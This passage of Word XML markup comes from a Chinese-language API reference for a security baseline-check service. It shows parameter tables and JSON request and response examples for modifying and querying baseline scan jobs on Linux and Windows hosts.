      <w:tr w:rsidR="00497C54" w14:paraId="45F92B6D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB6519F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63663FC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A9178B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled=true必填，cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="210567CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0303DF13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469193A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59DA268A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="786EE7CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676C2459" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ABB545B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA001B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，范围类型：0-主机；1-业务组；2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63DE91E7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BF9C42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EDA6253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFAD587" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="369DFE28" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C904067" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7503A86D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286144ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30BA6A39" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="662C1800" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A19F2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07645FC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，基线规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A89D0E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F9FE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "specId" : "5a71940b7d761b15dbce17ef",//必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ruleId": "1b8094cf2cacf0e42acf",  //必填，基线规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "cronEnabled": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "cron": "0 17 * * *",  //cronEnabled=true必填，cron任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C466279" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533C719B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status":"success",//任务修改状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF233F"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6E2C370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B57FCDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198C36A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33195705" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3542A372" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3148DE91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538F296E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3635491D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>删除结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C73DBEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588511F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="040E6056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36927A8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73C8B3C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="查询任务"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r>
        <w:t>查询任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A54788" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B62ACF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/job/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47953186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>ps：暂不支持分页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4199B1DA"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224"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5D5C62A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048DFAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B99D67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D8630A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B5F1F26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C428434" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED6944F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6904773C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统，必填：1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38850349" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B3AD34A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AC899AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBC2284" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43E8AD54" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DBDF7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B197B54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B9D12D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则id列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50FD2AE0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="504E4695" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F69E83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="412C065E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="003B48B8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B62AE57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C706B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75595C6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="625BB522" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D617835" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F4D8065" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B435D35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FC69FC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7340D55B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1945F581" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE809A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01EBC4C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE7A32F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "osType": 1,  //操作系统，必填 1-linux 2-windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "specName": "test",  //任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ruleIds": ["1b8094cf2cacf0e42acf"],  //规则id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": [1, 446],  //业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ip": "xxx",  //主机ip</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "hostName": "xxx",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platforms": ["centos-6"],  //操作系统列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C2D12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A0B11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "specId": "591e9185629f9f196bba7a2b",  // 任务规格Id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "jobId": "asdf",      // 最后一次任务ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "specName": "Test1",  // 任务规格名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "descroption": "xxx", //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ruleId": ""//规则ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ruleName": "规则２",  // 基线规则名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "checkTime": "2017-03-01", // 检查时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "duration": 0, //持续时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "hostCount": 12043,   // 主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "failedHostCount": 0, // 失败主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "successHostCount": 0, // 成功主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "progress": 0.2,      // 进度</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "passRate": 0.5,      // 通过率</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status": 0,           // 状态 0-Pending，1-Running，2-Done</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E576B03"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926"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2415B07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AB111C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1603E845" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF264E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77AB5BA2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F205238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45FF31FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2DBCA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AB387D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
